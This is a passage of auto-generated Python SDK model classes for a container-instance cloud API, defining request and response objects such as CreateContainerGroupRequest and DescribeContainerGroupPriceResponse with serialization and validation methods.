temp_model = UpdateContainerGroupRequestInitContainerSecurityContextCapability()
self.capability = temp_model.from_map(map['Capability'])
else:
self.capability = None
return self
class UpdateContainerGroupRequestInitContainer(TeaModel):
def __init__(self, name=None, image=None, cpu=None, memory=None, working_dir=None, image_pull_policy=None, stdin=None, stdin_once=None, tty=None, command=None, arg=None, environment_var=None, port=None, volume_mount=None, security_context=None, gpu=None):
self.name = name
self.image = image
self.cpu = cpu
self.memory = memory
self.working_dir = working_dir
self.image_pull_policy = image_pull_policy
self.stdin = stdin
self.stdin_once = stdin_once
self.tty = tty
self.command = []
self.arg = []
self.environment_var = []
self.port = []
self.volume_mount = []
self.security_context = security_context
self.gpu = gpu
def validate(self):
self.validate_required(self.command, 'command')
self.validate_required(self.arg, 'arg')
self.validate_required(self.environment_var, 'environment_var')
if self.environment_var:
for k in self.environment_var:
if k :
k.validate()
self.validate_required(self.port, 'port')
if self.port:
for k in self.port:
if k :
k.validate()
self.validate_required(self.volume_mount, 'volume_mount')
if self.volume_mount:
for k in self.volume_mount:
if k :
k.validate()
self.validate_required(self.security_context, 'security_context')
if self.security_context:
self.security_context.validate()
def to_map(self):
result = {}
result['Name'] = self.name
result['Image'] = self.image
result['Cpu'] = self.cpu
result['Memory'] = self.memory
result['WorkingDir'] = self.working_dir
result['ImagePullPolicy'] = self.image_pull_policy
result['Stdin'] = self.stdin
result['StdinOnce'] = self.stdin_once
result['Tty'] = self.tty
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
result['Arg'] = []
if self.arg is not None:
for k in self.arg:
result['Arg'].append(k)
else:
result['Arg'] = None
result['EnvironmentVar'] = []
if self.environment_var is not None:
for k in self.environment_var:
result['EnvironmentVar'].append(k.to_map() if k else None)
else:
result['EnvironmentVar'] = None
result['Port'] = []
if self.port is not None:
for k in self.port:
result['Port'].append(k.to_map() if k else None)
else:
result['Port'] = None
result['VolumeMount'] = []
if self.volume_mount is not None:
for k in self.volume_mount:
result['VolumeMount'].append(k.to_map() if k else None)
else:
result['VolumeMount'] = None
if self.security_context is not None:
result['SecurityContext'] = self.security_context.to_map()
else:
result['SecurityContext'] = None
result['Gpu'] = self.gpu
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.image = map.get('Image')
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
self.working_dir = map.get('WorkingDir')
self.image_pull_policy = map.get('ImagePullPolicy')
self.stdin = map.get('Stdin')
self.stdin_once = map.get('StdinOnce')
self.tty = map.get('Tty')
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
self.arg = []
if map.get('Arg') is not None:
for k in map.get('Arg'):
self.arg.append(k)
else:
self.arg = None
self.environment_var = []
if map.get('EnvironmentVar') is not None:
for k in map.get('EnvironmentVar'):
temp_model = UpdateContainerGroupRequestInitContainerEnvironmentVar()
temp_model = temp_model.from_map(k)
self.environment_var.append(temp_model)
else:
self.environment_var = None
self.port = []
if map.get('Port') is not None:
for k in map.get('Port'):
temp_model = UpdateContainerGroupRequestInitContainerPort()
temp_model = temp_model.from_map(k)
self.port.append(temp_model)
else:
self.port = None
self.volume_mount = []
if map.get('VolumeMount') is not None:
for k in map.get('VolumeMount'):
temp_model = UpdateContainerGroupRequestInitContainerVolumeMount()
temp_model = temp_model.from_map(k)
self.volume_mount.append(temp_model)
else:
self.volume_mount = None
if map.get('SecurityContext') is not None:
temp_model = UpdateContainerGroupRequestInitContainerSecurityContext()
self.security_context = temp_model.from_map(map['SecurityContext'])
else:
self.security_context = None
self.gpu = map.get('Gpu')
return self
class UpdateContainerGroupRequestImageRegistryCredential(TeaModel):
def __init__(self, server=None, user_name=None, password=None):
self.server = server
self.user_name = user_name
self.password = password
def validate(self):
pass
def to_map(self):
result = {}
result['Server'] = self.server
result['UserName'] = self.user_name
result['Password'] = self.password
return result
def from_map(self, map={}):
self.server = map.get('Server')
self.user_name = map.get('UserName')
self.password = map.get('Password')
return self
class UpdateContainerGroupResponse(TeaModel):
def __init__(self, request_id=None):
self.request_id = request_id
def validate(self):
self.validate_required(self.request_id, 'request_id')
def to_map(self):
result = {}
result['RequestId'] = self.request_id
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
return self
class DescribeContainerGroupPriceRequest(TeaModel):
def __init__(self, region_id=None, cpu=None, memory=None, instance_type=None, spot_strategy=None, zone_id=None, spot_price_limit=None):
self.region_id = region_id
self.cpu = cpu
self.memory = memory
self.instance_type = instance_type
self.spot_strategy = spot_strategy
self.zone_id = zone_id
self.spot_price_limit = spot_price_limit
def validate(self):
self.validate_required(self.region_id, 'region_id')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['Cpu'] = self.cpu
result['Memory'] = self.memory
result['InstanceType'] = self.instance_type
result['SpotStrategy'] = self.spot_strategy
result['ZoneId'] = self.zone_id
result['SpotPriceLimit'] = self.spot_price_limit
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
self.instance_type = map.get('InstanceType')
self.spot_strategy = map.get('SpotStrategy')
self.zone_id = map.get('ZoneId')
self.spot_price_limit = map.get('SpotPriceLimit')
return self
class DescribeContainerGroupPriceResponse(TeaModel):
def __init__(self, request_id=None, price_info=None):
self.request_id = request_id
self.price_info = price_info
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.price_info, 'price_info')
if self.price_info:
self.price_info.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.price_info is not None:
result['PriceInfo'] = self.price_info.to_map()
else:
result['PriceInfo'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('PriceInfo') is not None:
temp_model = DescribeContainerGroupPriceResponsePriceInfo()
self.price_info = temp_model.from_map(map['PriceInfo'])
else:
self.price_info = None
return self
class DescribeContainerGroupPriceResponsePriceInfoRulesRule(TeaModel):
def __init__(self, rule_id=None, description=None):
self.rule_id = rule_id
self.description = description
def validate(self):
self.validate_required(self.rule_id, 'rule_id')
self.validate_required(self.description, 'description')
def to_map(self):
result = {}
result['RuleId'] = self.rule_id
result['Description'] = self.description
return result
def from_map(self, map={}):
self.rule_id = map.get('RuleId')
self.description = map.get('Description')
return self
class DescribeContainerGroupPriceResponsePriceInfoRules(TeaModel):
def __init__(self, rule=None):
self.rule = []
def validate(self):
self.validate_required(self.rule, 'rule')
if self.rule:
for k in self.rule:
if k :
k.validate()
def to_map(self):
result = {}
result['Rule'] = []
if self.rule is not None:
for k in self.rule:
result['Rule'].append(k.to_map() if k else None)
else:
result['Rule'] = None
return result
def from_map(self, map={}):
self.rule = []
if map.get('Rule') is not None:
for k in map.get('Rule'):
temp_model = DescribeContainerGroupPriceResponsePriceInfoRulesRule()
temp_model = temp_model.from_map(k)
self.rule.append(temp_model)
else:
self.rule = None
return self
class DescribeContainerGroupPriceResponsePriceInfoSpotPricesSpotPrice(TeaModel):
def __init__(self, zone_id=None, instance_type=None, spot_price=None, origin_price=None):
self.zone_id = zone_id
self.instance_type = instance_type
self.spot_price = spot_price
self.origin_price = origin_price
def validate(self):
self.validate_required(self.zone_id, 'zone_id')
self.validate_required(self.instance_type, 'instance_type')
self.validate_required(self.spot_price, 'spot_price')
self.validate_required(self.origin_price, 'origin_price')
def to_map(self):
result = {}
result['ZoneId'] = self.zone_id
result['InstanceType'] = self.instance_type
result['SpotPrice'] = self.spot_price
result['OriginPrice'] = self.origin_price
return result
def from_map(self, map={}):
self.zone_id = map.get('ZoneId')
self.instance_type = map.get('InstanceType')
self.spot_price = map.get('SpotPrice')
self.origin_price = map.get('OriginPrice')
return self
class DescribeContainerGroupPriceResponsePriceInfoSpotPrices(TeaModel):
def __init__(self, spot_price=None):
self.spot_price = []
def validate(self):
self.validate_required(self.spot_price, 'spot_price')
if self.spot_price:
for k in self.spot_price:
if k :
k.validate()
def to_map(self):
result = {}
result['SpotPrice'] = []
if self.spot_price is not None:
for k in self.spot_price:
result['SpotPrice'].append(k.to_map() if k else None)
else:
result['SpotPrice'] = None
return result
def from_map(self, map={}):
self.spot_price = []
if map.get('SpotPrice') is not None:
for k in map.get('SpotPrice'):
temp_model = DescribeContainerGroupPriceResponsePriceInfoSpotPricesSpotPrice()
temp_model = temp_model.from_map(k)
self.spot_price.append(temp_model)
else:
self.spot_price = None
return self
class DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfoRulesRule(TeaModel):
def __init__(self, rule_id=None, description=None):
self.rule_id = rule_id
self.description = description
def validate(self):
self.validate_required(self.rule_id, 'rule_id')
self.validate_required(self.description, 'description')
def to_map(self):
result = {}
result['RuleId'] = self.rule_id
result['Description'] = self.description
return result
def from_map(self, map={}):
self.rule_id = map.get('RuleId')
self.description = map.get('Description')
return self
class DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfoRules(TeaModel):
def __init__(self, rule=None):
self.rule = []
def validate(self):
self.validate_required(self.rule, 'rule')
if self.rule:
for k in self.rule:
if k :
k.validate()
def to_map(self):
result = {}
result['Rule'] = []
if self.rule is not None:
for k in self.rule:
result['Rule'].append(k.to_map() if k else None)
else:
result['Rule'] = None
return result
def from_map(self, map={}):
self.rule = []
if map.get('Rule') is not None:
for k in map.get('Rule'):
temp_model = DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfoRulesRule()
temp_model = temp_model.from_map(k)
self.rule.append(temp_model)
else:
self.rule = None
return self
class DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfo(TeaModel):
def __init__(self, resource=None, original_price=None, discount_price=None, trade_price=None, rules=None):
self.resource = resource
self.original_price = original_price
self.discount_price = discount_price
self.trade_price = trade_price
self.rules = rules
def validate(self):
self.validate_required(self.resource, 'resource')
self.validate_required(self.original_price, 'original_price')
self.validate_required(self.discount_price, 'discount_price')
self.validate_required(self.trade_price, 'trade_price')
self.validate_required(self.rules, 'rules')
if self.rules:
self.rules.validate()
def to_map(self):
result = {}
result['Resource'] = self.resource
result['OriginalPrice'] = self.original_price
result['DiscountPrice'] = self.discount_price
result['TradePrice'] = self.trade_price
if self.rules is not None:
result['Rules'] = self.rules.to_map()
else:
result['Rules'] = None
return result
def from_map(self, map={}):
self.resource = map.get('Resource')
self.original_price = map.get('OriginalPrice')
self.discount_price = map.get('DiscountPrice')
self.trade_price = map.get('TradePrice')
if map.get('Rules') is not None:
temp_model = DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfoRules()
self.rules = temp_model.from_map(map['Rules'])
else:
self.rules = None
return self
class DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfos(TeaModel):
def __init__(self, detail_info=None):
self.detail_info = []
def validate(self):
self.validate_required(self.detail_info, 'detail_info')
if self.detail_info:
for k in self.detail_info:
if k :
k.validate()
def to_map(self):
result = {}
result['DetailInfo'] = []
if self.detail_info is not None:
for k in self.detail_info:
result['DetailInfo'].append(k.to_map() if k else None)
else:
result['DetailInfo'] = None
return result
def from_map(self, map={}):
self.detail_info = []
if map.get('DetailInfo') is not None:
for k in map.get('DetailInfo'):
temp_model = DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfosDetailInfo()
temp_model = temp_model.from_map(k)
self.detail_info.append(temp_model)
else:
self.detail_info = None
return self
class DescribeContainerGroupPriceResponsePriceInfoPrice(TeaModel):
def __init__(self, original_price=None, discount_price=None, trade_price=None, currency=None, detail_infos=None):
self.original_price = original_price
self.discount_price = discount_price
self.trade_price = trade_price
self.currency = currency
self.detail_infos = detail_infos
def validate(self):
self.validate_required(self.original_price, 'original_price')
self.validate_required(self.discount_price, 'discount_price')
self.validate_required(self.trade_price, 'trade_price')
self.validate_required(self.currency, 'currency')
self.validate_required(self.detail_infos, 'detail_infos')
if self.detail_infos:
self.detail_infos.validate()
def to_map(self):
result = {}
result['OriginalPrice'] = self.original_price
result['DiscountPrice'] = self.discount_price
result['TradePrice'] = self.trade_price
result['Currency'] = self.currency
if self.detail_infos is not None:
result['DetailInfos'] = self.detail_infos.to_map()
else:
result['DetailInfos'] = None
return result
def from_map(self, map={}):
self.original_price = map.get('OriginalPrice')
self.discount_price = map.get('DiscountPrice')
self.trade_price = map.get('TradePrice')
self.currency = map.get('Currency')
if map.get('DetailInfos') is not None:
temp_model = DescribeContainerGroupPriceResponsePriceInfoPriceDetailInfos()
self.detail_infos = temp_model.from_map(map['DetailInfos'])
else:
self.detail_infos = None
return self
class DescribeContainerGroupPriceResponsePriceInfo(TeaModel):
def __init__(self, rules=None, spot_prices=None, price=None):
self.rules = rules
self.spot_prices = spot_prices
self.price = price
def validate(self):
self.validate_required(self.rules, 'rules')
if self.rules:
self.rules.validate()
self.validate_required(self.spot_prices, 'spot_prices')
if self.spot_prices:
self.spot_prices.validate()
self.validate_required(self.price, 'price')
if self.price:
self.price.validate()
def to_map(self):
result = {}
if self.rules is not None:
result['Rules'] = self.rules.to_map()
else:
result['Rules'] = None
if self.spot_prices is not None:
result['SpotPrices'] = self.spot_prices.to_map()
else:
result['SpotPrices'] = None
if self.price is not None:
result['Price'] = self.price.to_map()
else:
result['Price'] = None
return result
def from_map(self, map={}):
if map.get('Rules') is not None:
temp_model = DescribeContainerGroupPriceResponsePriceInfoRules()
self.rules = temp_model.from_map(map['Rules'])
else:
self.rules = None
if map.get('SpotPrices') is not None:
temp_model = DescribeContainerGroupPriceResponsePriceInfoSpotPrices()
self.spot_prices = temp_model.from_map(map['SpotPrices'])
else:
self.spot_prices = None
if map.get('Price') is not None:
temp_model = DescribeContainerGroupPriceResponsePriceInfoPrice()
self.price = temp_model.from_map(map['Price'])
else:
self.price = None
return self
class ExecContainerCommandRequest(TeaModel):
def __init__(self, region_id=None, container_group_id=None, container_name=None, command=None, _tty=None, stdin=None):
self.region_id = region_id
self.container_group_id = container_group_id
self.container_name = container_name
self.command = command
self._tty = _tty
self.stdin = stdin
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.container_group_id, 'container_group_id')
self.validate_required(self.container_name, 'container_name')
self.validate_required(self.command, 'command')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ContainerGroupId'] = self.container_group_id
result['ContainerName'] = self.container_name
result['Command'] = self.command
result['TTY'] = self._tty
result['Stdin'] = self.stdin
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.container_group_id = map.get('ContainerGroupId')
self.container_name = map.get('ContainerName')
self.command = map.get('Command')
self._tty = map.get('TTY')
self.stdin = map.get('Stdin')
return self
class ExecContainerCommandResponse(TeaModel):
def __init__(self, request_id=None, web_socket_uri=None):
self.request_id = request_id
self.web_socket_uri = web_socket_uri
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.web_socket_uri, 'web_socket_uri')
def to_map(self):
result = {}
result['RequestId'] = self.request_id
result['WebSocketUri'] = self.web_socket_uri
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
self.web_socket_uri = map.get('WebSocketUri')
return self
class DescribeContainerLogRequest(TeaModel):
def __init__(self, region_id=None, container_group_id=None, container_name=None, start_time=None, tail=None, last_time=None, since_seconds=None, limit_bytes=None):
self.region_id = region_id
self.container_group_id = container_group_id
self.container_name = container_name
self.start_time = start_time
self.tail = tail
self.last_time = last_time
self.since_seconds = since_seconds
self.limit_bytes = limit_bytes
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.container_group_id, 'container_group_id')
self.validate_required(self.container_name, 'container_name')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ContainerGroupId'] = self.container_group_id
result['ContainerName'] = self.container_name
result['StartTime'] = self.start_time
result['Tail'] = self.tail
result['LastTime'] = self.last_time
result['SinceSeconds'] = self.since_seconds
result['LimitBytes'] = self.limit_bytes
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.container_group_id = map.get('ContainerGroupId')
self.container_name = map.get('ContainerName')
self.start_time = map.get('StartTime')
self.tail = map.get('Tail')
self.last_time = map.get('LastTime')
self.since_seconds = map.get('SinceSeconds')
self.limit_bytes = map.get('LimitBytes')
return self
class DescribeContainerLogResponse(TeaModel):
def __init__(self, request_id=None, container_name=None, content=None):
self.request_id = request_id
self.container_name = container_name
self.content = content
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.container_name, 'container_name')
self.validate_required(self.content, 'content')
def to_map(self):
result = {}
result['RequestId'] = self.request_id
result['ContainerName'] = self.container_name
result['Content'] = self.content
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
self.container_name = map.get('ContainerName')
self.content = map.get('Content')
return self
class CreateContainerGroupRequest(TeaModel):
def __init__(self, region_id=None, zone_id=None, security_group_id=None, v_switch_id=None, container_group_name=None, restart_policy=None, tag=None, image_registry_credential=None, container=None, volume=None, eip_instance_id=None, init_container=None, dns_config=None, cpu=None, memory=None, resource_group_id=None, dns_policy=None, client_token=None, host_aliase=None, arn=None, instance_type=None, security_context=None, sls_enable=None, image_snapshot_id=None, ram_role_name=None, ntp_server=None, termination_grace_period_seconds=None, auto_match_image_cache=None, ipv_6address_count=None, active_deadline_seconds=None, spot_strategy=None, spot_price_limit=None, schedule_strategy=None, tenant_vswitch_id=None, tenant_security_group_id=None, core_pattern=None):
self.region_id = region_id
self.zone_id = zone_id
self.security_group_id = security_group_id
self.v_switch_id = v_switch_id
self.container_group_name = container_group_name
self.restart_policy = restart_policy
self.tag = []
self.image_registry_credential = []
self.container = []
self.volume = []
self.eip_instance_id = eip_instance_id
self.init_container = []
self.dns_config = dns_config
self.cpu = cpu
self.memory = memory
self.resource_group_id = resource_group_id
self.dns_policy = dns_policy
self.client_token = client_token
self.host_aliase = []
self.arn = []
self.instance_type = instance_type
self.security_context = security_context
self.sls_enable = sls_enable
self.image_snapshot_id = image_snapshot_id
self.ram_role_name = ram_role_name
self.ntp_server = []
self.termination_grace_period_seconds = termination_grace_period_seconds
self.auto_match_image_cache = auto_match_image_cache
self.ipv_6address_count = ipv_6address_count
self.active_deadline_seconds = active_deadline_seconds
self.spot_strategy = spot_strategy
self.spot_price_limit = spot_price_limit
self.schedule_strategy = schedule_strategy
self.tenant_vswitch_id = tenant_vswitch_id
self.tenant_security_group_id = tenant_security_group_id
self.core_pattern = core_pattern
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.security_group_id, 'security_group_id')
self.validate_required(self.v_switch_id, 'v_switch_id')
self.validate_required(self.container_group_name, 'container_group_name')
if self.tag:
for k in self.tag:
if k :
k.validate()
if self.image_registry_credential:
for k in self.image_registry_credential:
if k :
k.validate()
self.validate_required(self.container, 'container')
if self.container:
for k in self.container:
if k :
k.validate()
if self.volume:
for k in self.volume:
if k :
k.validate()
if self.init_container:
for k in self.init_container:
if k :
k.validate()
self.validate_required(self.dns_config, 'dns_config')
if self.dns_config:
self.dns_config.validate()
if self.host_aliase:
for k in self.host_aliase:
if k :
k.validate()
if self.arn:
for k in self.arn:
if k :
k.validate()
self.validate_required(self.security_context, 'security_context')
if self.security_context:
self.security_context.validate()
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ZoneId'] = self.zone_id
result['SecurityGroupId'] = self.security_group_id
result['VSwitchId'] = self.v_switch_id
result['ContainerGroupName'] = self.container_group_name
result['RestartPolicy'] = self.restart_policy
result['Tag'] = []
if self.tag is not None:
for k in self.tag:
result['Tag'].append(k.to_map() if k else None)
else:
result['Tag'] = None
result['ImageRegistryCredential'] = []
if self.image_registry_credential is not None:
for k in self.image_registry_credential:
result['ImageRegistryCredential'].append(k.to_map() if k else None)
else:
result['ImageRegistryCredential'] = None
result['Container'] = []
if self.container is not None:
for k in self.container:
result['Container'].append(k.to_map() if k else None)
else:
result['Container'] = None
result['Volume'] = []
if self.volume is not None:
for k in self.volume:
result['Volume'].append(k.to_map() if k else None)
else:
result['Volume'] = None
result['EipInstanceId'] = self.eip_instance_id
result['InitContainer'] = []
if self.init_container is not None:
for k in self.init_container:
result['InitContainer'].append(k.to_map() if k else None)
else:
result['InitContainer'] = None
if self.dns_config is not None:
result['DnsConfig'] = self.dns_config.to_map()
else:
result['DnsConfig'] = None
result['Cpu'] = self.cpu
result['Memory'] = self.memory
result['ResourceGroupId'] = self.resource_group_id
result['DnsPolicy'] = self.dns_policy
result['ClientToken'] = self.client_token
result['HostAliase'] = []
if self.host_aliase is not None:
for k in self.host_aliase:
result['HostAliase'].append(k.to_map() if k else None)
else:
result['HostAliase'] = None
result['Arn'] = []
if self.arn is not None:
for k in self.arn:
result['Arn'].append(k.to_map() if k else None)
else:
result['Arn'] = None
result['InstanceType'] = self.instance_type
if self.security_context is not None:
result['SecurityContext'] = self.security_context.to_map()
else:
result['SecurityContext'] = None
result['SlsEnable'] = self.sls_enable
result['ImageSnapshotId'] = self.image_snapshot_id
result['RamRoleName'] = self.ram_role_name
result['NtpServer'] = []
if self.ntp_server is not None:
for k in self.ntp_server:
result['NtpServer'].append(k)
else:
result['NtpServer'] = None
result['TerminationGracePeriodSeconds'] = self.termination_grace_period_seconds
result['AutoMatchImageCache'] = self.auto_match_image_cache
result['Ipv6AddressCount'] = self.ipv_6address_count
result['ActiveDeadlineSeconds'] = self.active_deadline_seconds
result['SpotStrategy'] = self.spot_strategy
result['SpotPriceLimit'] = self.spot_price_limit
result['ScheduleStrategy'] = self.schedule_strategy
result['TenantVSwitchId'] = self.tenant_vswitch_id
result['TenantSecurityGroupId'] = self.tenant_security_group_id
result['CorePattern'] = self.core_pattern
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.zone_id = map.get('ZoneId')
self.security_group_id = map.get('SecurityGroupId')
self.v_switch_id = map.get('VSwitchId')
self.container_group_name = map.get('ContainerGroupName')
self.restart_policy = map.get('RestartPolicy')
self.tag = []
if map.get('Tag') is not None:
for k in map.get('Tag'):
temp_model = CreateContainerGroupRequestTag()
temp_model = temp_model.from_map(k)
self.tag.append(temp_model)
else:
self.tag = None
self.image_registry_credential = []
if map.get('ImageRegistryCredential') is not None:
for k in map.get('ImageRegistryCredential'):
temp_model = CreateContainerGroupRequestImageRegistryCredential()
temp_model = temp_model.from_map(k)
self.image_registry_credential.append(temp_model)
else:
self.image_registry_credential = None
self.container = []
if map.get('Container') is not None:
for k in map.get('Container'):
temp_model = CreateContainerGroupRequestContainer()
temp_model = temp_model.from_map(k)
self.container.append(temp_model)
else:
self.container = None
self.volume = []
if map.get('Volume') is not None:
for k in map.get('Volume'):
temp_model = CreateContainerGroupRequestVolume()
temp_model = temp_model.from_map(k)
self.volume.append(temp_model)
else:
self.volume = None
self.eip_instance_id = map.get('EipInstanceId')
self.init_container = []
if map.get('InitContainer') is not None:
for k in map.get('InitContainer'):
temp_model = CreateContainerGroupRequestInitContainer()
temp_model = temp_model.from_map(k)
self.init_container.append(temp_model)
else:
self.init_container = None
if map.get('DnsConfig') is not None:
temp_model = CreateContainerGroupRequestDnsConfig()
self.dns_config = temp_model.from_map(map['DnsConfig'])
else:
self.dns_config = None
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
self.resource_group_id = map.get('ResourceGroupId')
self.dns_policy = map.get('DnsPolicy')
self.client_token = map.get('ClientToken')
self.host_aliase = []
if map.get('HostAliase') is not None:
for k in map.get('HostAliase'):
temp_model = CreateContainerGroupRequestHostAliase()
temp_model = temp_model.from_map(k)
self.host_aliase.append(temp_model)
else:
self.host_aliase = None
self.arn = []
if map.get('Arn') is not None:
for k in map.get('Arn'):
temp_model = CreateContainerGroupRequestArn()
temp_model = temp_model.from_map(k)
self.arn.append(temp_model)
else:
self.arn = None
self.instance_type = map.get('InstanceType')
if map.get('SecurityContext') is not None:
temp_model = CreateContainerGroupRequestSecurityContext()
self.security_context = temp_model.from_map(map['SecurityContext'])
else:
self.security_context = None
self.sls_enable = map.get('SlsEnable')
self.image_snapshot_id = map.get('ImageSnapshotId')
self.ram_role_name = map.get('RamRoleName')
self.ntp_server = []
if map.get('NtpServer') is not None:
for k in map.get('NtpServer'):
self.ntp_server.append(k)
else:
self.ntp_server = None
self.termination_grace_period_seconds = map.get('TerminationGracePeriodSeconds')
self.auto_match_image_cache = map.get('AutoMatchImageCache')
self.ipv_6address_count = map.get('Ipv6AddressCount')
self.active_deadline_seconds = map.get('ActiveDeadlineSeconds')
self.spot_strategy = map.get('SpotStrategy')
self.spot_price_limit = map.get('SpotPriceLimit')
self.schedule_strategy = map.get('ScheduleStrategy')
self.tenant_vswitch_id = map.get('TenantVSwitchId')
self.tenant_security_group_id = map.get('TenantSecurityGroupId')
self.core_pattern = map.get('CorePattern')
return self
class CreateContainerGroupRequestTag(TeaModel):
def __init__(self, key=None, value=None):
self.key = key
self.value = value
def validate(self):
self.validate_required(self.key, 'key')
self.validate_required(self.value, 'value')
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
return self
class CreateContainerGroupRequestImageRegistryCredential(TeaModel):
def __init__(self, server=None, user_name=None, password=None):
self.server = server
self.user_name = user_name
self.password = password
def validate(self):
self.validate_required(self.server, 'server')
self.validate_required(self.user_name, 'user_name')
self.validate_required(self.password, 'password')
def to_map(self):
result = {}
result['Server'] = self.server
result['UserName'] = self.user_name
result['Password'] = self.password
return result
def from_map(self, map={}):
self.server = map.get('Server')
self.user_name = map.get('UserName')
self.password = map.get('Password')
return self
class CreateContainerGroupRequestContainerVolumeMount(TeaModel):
def __init__(self, mount_path=None, read_only=None, name=None, sub_path=None):
self.mount_path = mount_path
self.read_only = read_only
self.name = name
self.sub_path = sub_path
def validate(self):
self.validate_required(self.mount_path, 'mount_path')
self.validate_required(self.read_only, 'read_only')
def to_map(self):
result = {}
result['MountPath'] = self.mount_path
result['ReadOnly'] = self.read_only
result['Name'] = self.name
result['SubPath'] = self.sub_path
return result
def from_map(self, map={}):
self.mount_path = map.get('MountPath')
self.read_only = map.get('ReadOnly')
self.name = map.get('Name')
self.sub_path = map.get('SubPath')
return self
class CreateContainerGroupRequestContainerPort(TeaModel):
def __init__(self, protocol=None, port=None):
self.protocol = protocol
self.port = port
def validate(self):
self.validate_required(self.protocol, 'protocol')
self.validate_required(self.port, 'port')
def to_map(self):
result = {}
result['Protocol'] = self.protocol
result['Port'] = self.port
return result
def from_map(self, map={}):
self.protocol = map.get('Protocol')
self.port = map.get('Port')
return self
class CreateContainerGroupRequestContainerEnvironmentVarFieldRef(TeaModel):
def __init__(self, field_path=None):
self.field_path = field_path
def validate(self):
pass
def to_map(self):
result = {}
result['FieldPath'] = self.field_path
return result
def from_map(self, map={}):
self.field_path = map.get('FieldPath')
return self
class CreateContainerGroupRequestContainerEnvironmentVar(TeaModel):
def __init__(self, key=None, value=None, field_ref=None):
self.key = key
self.value = value
self.field_ref = field_ref
def validate(self):
self.validate_required(self.field_ref, 'field_ref')
if self.field_ref:
self.field_ref.validate()
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
if self.field_ref is not None:
result['FieldRef'] = self.field_ref.to_map()
else:
result['FieldRef'] = None
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
if map.get('FieldRef') is not None:
temp_model = CreateContainerGroupRequestContainerEnvironmentVarFieldRef()
self.field_ref = temp_model.from_map(map['FieldRef'])
else:
self.field_ref = None
return self
class CreateContainerGroupRequestContainerReadinessProbeHttpGet(TeaModel):
def __init__(self, path=None, port=None, scheme=None):
self.path = path
self.port = port
self.scheme = scheme
def validate(self):
pass
def to_map(self):
result = {}
result['Path'] = self.path
result['Port'] = self.port
result['Scheme'] = self.scheme
return result
def from_map(self, map={}):
self.path = map.get('Path')
self.port = map.get('Port')
self.scheme = map.get('Scheme')
return self
class CreateContainerGroupRequestContainerReadinessProbeExec(TeaModel):
def __init__(self, command=None):
self.command = []
def validate(self):
self.validate_required(self.command, 'command')
def to_map(self):
result = {}
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
return result
def from_map(self, map={}):
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
return self
class CreateContainerGroupRequestContainerReadinessProbeTcpSocket(TeaModel):
def __init__(self, port=None):
self.port = port
def validate(self):
pass
def to_map(self):
result = {}
result['Port'] = self.port
return result
def from_map(self, map={}):
self.port = map.get('Port')
return self
class CreateContainerGroupRequestContainerReadinessProbe(TeaModel):
def __init__(self, http_get=None, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None, exec=None, tcp_socket=None):
self.http_get = http_get
self.initial_delay_seconds = initial_delay_seconds
self.period_seconds = period_seconds
self.success_threshold = success_threshold
self.failure_threshold = failure_threshold
self.timeout_seconds = timeout_seconds
self.exec = exec
self.tcp_socket = tcp_socket
def validate(self):
self.validate_required(self.http_get, 'http_get')
if self.http_get:
self.http_get.validate()
self.validate_required(self.exec, 'exec')
if self.exec:
self.exec.validate()
self.validate_required(self.tcp_socket, 'tcp_socket')
if self.tcp_socket:
self.tcp_socket.validate()
def to_map(self):
result = {}
if self.http_get is not None:
result['HttpGet'] = self.http_get.to_map()
else:
result['HttpGet'] = None
result['InitialDelaySeconds'] = self.initial_delay_seconds
result['PeriodSeconds'] = self.period_seconds
result['SuccessThreshold'] = self.success_threshold
result['FailureThreshold'] = self.failure_threshold
result['TimeoutSeconds'] = self.timeout_seconds
if self.exec is not None:
result['Exec'] = self.exec.to_map()
else:
result['Exec'] = None
if self.tcp_socket is not None:
result['TcpSocket'] = self.tcp_socket.to_map()
else:
result['TcpSocket'] = None
return result
def from_map(self, map={}):
if map.get('HttpGet') is not None:
temp_model = CreateContainerGroupRequestContainerReadinessProbeHttpGet()
self.http_get = temp_model.from_map(map['HttpGet'])
else:
self.http_get = None
